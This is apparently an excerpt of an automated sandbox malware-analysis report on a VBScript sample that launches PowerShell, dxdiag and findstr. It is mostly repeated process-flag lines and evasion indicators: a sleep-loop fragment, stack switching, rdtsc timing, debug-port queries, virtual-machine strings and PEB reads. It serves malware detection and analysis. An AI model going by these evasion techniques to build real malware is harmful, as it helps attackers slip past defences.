              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Potential evasive VBS script found (sleep loop)
              Source: Initial fileInitial file: Do While Palmetto215.Status = 0 WScript.Sleep 100
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\dxdiag.exeAPI/Special instruction interceptor: Address: 4380BCC
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FFCC372D324
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FFCC372D944
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FFCC372D504
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FFCC372D544
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FFCC372D1E4
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031CBBA0 rdtsc 30_2_031CBBA0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5276Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4597Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5622Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3816Jump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeAPI coverage: 0.8 %
              Source: C:\Windows\SysWOW64\findstr.exeAPI coverage: 2.8 %
              Source: C:\Windows\System32\wscript.exe TID: 7312Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7632Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0086C830 FindFirstFileW,FindNextFileW,FindClose,30_2_0086C830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000003.00000002.1461444403.00000223A7EF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2225%SystemRoot%\system32\mswsock.dllU
              Source: wscript.exe, 00000000.00000002.1201354995.0000020C55A0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1184335860.0000020C559BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1185263241.0000020C55958000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1185263241.0000020C559BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1201113751.0000020C559BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1185125416.0000020C559BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1201113751.0000020C55958000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197476826.0000020C55950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198527999.0000020C559BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198527999.0000020C55957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1184934121.0000020C55931000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2470664491.000001FDE9C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000005.00000002.2468164496.000001FDE442B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: dxdiag.exe, 00000019.00000002.2166177608.0000000007EC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: PING.EXE, 00000001.00000002.1190455867.000001FE71239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031CBBA0 rdtsc 30_2_031CBBA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09410000 LdrInitializeThunk,12_2_09410000
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD33A5 mov eax, dword ptr fs:[00000030h]25_2_23AD33A5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE33A0 mov eax, dword ptr fs:[00000030h]25_2_23AE33A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE33A0 mov eax, dword ptr fs:[00000030h]25_2_23AE33A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAE388 mov eax, dword ptr fs:[00000030h]25_2_23AAE388
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAE388 mov eax, dword ptr fs:[00000030h]25_2_23AAE388
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAE388 mov eax, dword ptr fs:[00000030h]25_2_23AAE388
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD438F mov eax, dword ptr fs:[00000030h]25_2_23AD438F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD438F mov eax, dword ptr fs:[00000030h]25_2_23AD438F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B8539D mov eax, dword ptr fs:[00000030h]25_2_23B8539D
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B0739A mov eax, dword ptr fs:[00000030h]25_2_23B0739A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B0739A mov eax, dword ptr fs:[00000030h]25_2_23B0739A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA8397 mov eax, dword ptr fs:[00000030h]25_2_23AA8397
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA8397 mov eax, dword ptr fs:[00000030h]25_2_23AA8397
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA8397 mov eax, dword ptr fs:[00000030h]25_2_23AA8397
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B853FC mov eax, dword ptr fs:[00000030h]25_2_23B853FC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC03E9 mov eax, dword ptr fs:[00000030h]25_2_23AC03E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC03E9 mov eax, dword ptr fs:[00000030h]25_2_23AC03E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC03E9 mov eax, dword ptr fs:[00000030h]25_2_23AC03E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC03E9 mov eax, dword ptr fs:[00000030h]25_2_23AC03E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC03E9 mov eax, dword ptr fs:[00000030h]25_2_23AC03E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC03E9 mov eax, dword ptr fs:[00000030h]25_2_23AC03E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC03E9 mov eax, dword ptr fs:[00000030h]25_2_23AC03E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC03E9 mov eax, dword ptr fs:[00000030h]25_2_23AC03E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6F3E6 mov eax, dword ptr fs:[00000030h]25_2_23B6F3E6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE63FF mov eax, dword ptr fs:[00000030h]25_2_23AE63FF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACE3F0 mov eax, dword ptr fs:[00000030h]25_2_23ACE3F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACE3F0 mov eax, dword ptr fs:[00000030h]25_2_23ACE3F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACE3F0 mov eax, dword ptr fs:[00000030h]25_2_23ACE3F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6B3D0 mov ecx, dword ptr fs:[00000030h]25_2_23B6B3D0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA3C0 mov eax, dword ptr fs:[00000030h]25_2_23ABA3C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA3C0 mov eax, dword ptr fs:[00000030h]25_2_23ABA3C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA3C0 mov eax, dword ptr fs:[00000030h]25_2_23ABA3C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA3C0 mov eax, dword ptr fs:[00000030h]25_2_23ABA3C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA3C0 mov eax, dword ptr fs:[00000030h]25_2_23ABA3C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA3C0 mov eax, dword ptr fs:[00000030h]25_2_23ABA3C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB83C0 mov eax, dword ptr fs:[00000030h]25_2_23AB83C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB83C0 mov eax, dword ptr fs:[00000030h]25_2_23AB83C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB83C0 mov eax, dword ptr fs:[00000030h]25_2_23AB83C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB83C0 mov eax, dword ptr fs:[00000030h]25_2_23AB83C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6C3CD mov eax, dword ptr fs:[00000030h]25_2_23B6C3CD
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADF32A mov eax, dword ptr fs:[00000030h]25_2_23ADF32A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA7330 mov eax, dword ptr fs:[00000030h]25_2_23AA7330
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7132D mov eax, dword ptr fs:[00000030h]25_2_23B7132D
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7132D mov eax, dword ptr fs:[00000030h]25_2_23B7132D
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AEA30B mov eax, dword ptr fs:[00000030h]25_2_23AEA30B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AEA30B mov eax, dword ptr fs:[00000030h]25_2_23AEA30B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AEA30B mov eax, dword ptr fs:[00000030h]25_2_23AEA30B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3930B mov eax, dword ptr fs:[00000030h]25_2_23B3930B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3930B mov eax, dword ptr fs:[00000030h]25_2_23B3930B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3930B mov eax, dword ptr fs:[00000030h]25_2_23B3930B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAC310 mov ecx, dword ptr fs:[00000030h]25_2_23AAC310
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD0310 mov ecx, dword ptr fs:[00000030h]25_2_23AD0310
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B5437C mov eax, dword ptr fs:[00000030h]25_2_23B5437C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6F367 mov eax, dword ptr fs:[00000030h]25_2_23B6F367
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB7370 mov eax, dword ptr fs:[00000030h]25_2_23AB7370
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB7370 mov eax, dword ptr fs:[00000030h]25_2_23AB7370
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB7370 mov eax, dword ptr fs:[00000030h]25_2_23AB7370
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7A352 mov eax, dword ptr fs:[00000030h]25_2_23B7A352
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAD34C mov eax, dword ptr fs:[00000030h]25_2_23AAD34C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAD34C mov eax, dword ptr fs:[00000030h]25_2_23AAD34C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3035C mov eax, dword ptr fs:[00000030h]25_2_23B3035C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3035C mov eax, dword ptr fs:[00000030h]25_2_23B3035C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3035C mov eax, dword ptr fs:[00000030h]25_2_23B3035C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3035C mov ecx, dword ptr fs:[00000030h]25_2_23B3035C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3035C mov eax, dword ptr fs:[00000030h]25_2_23B3035C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3035C mov eax, dword ptr fs:[00000030h]25_2_23B3035C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B85341 mov eax, dword ptr fs:[00000030h]25_2_23B85341
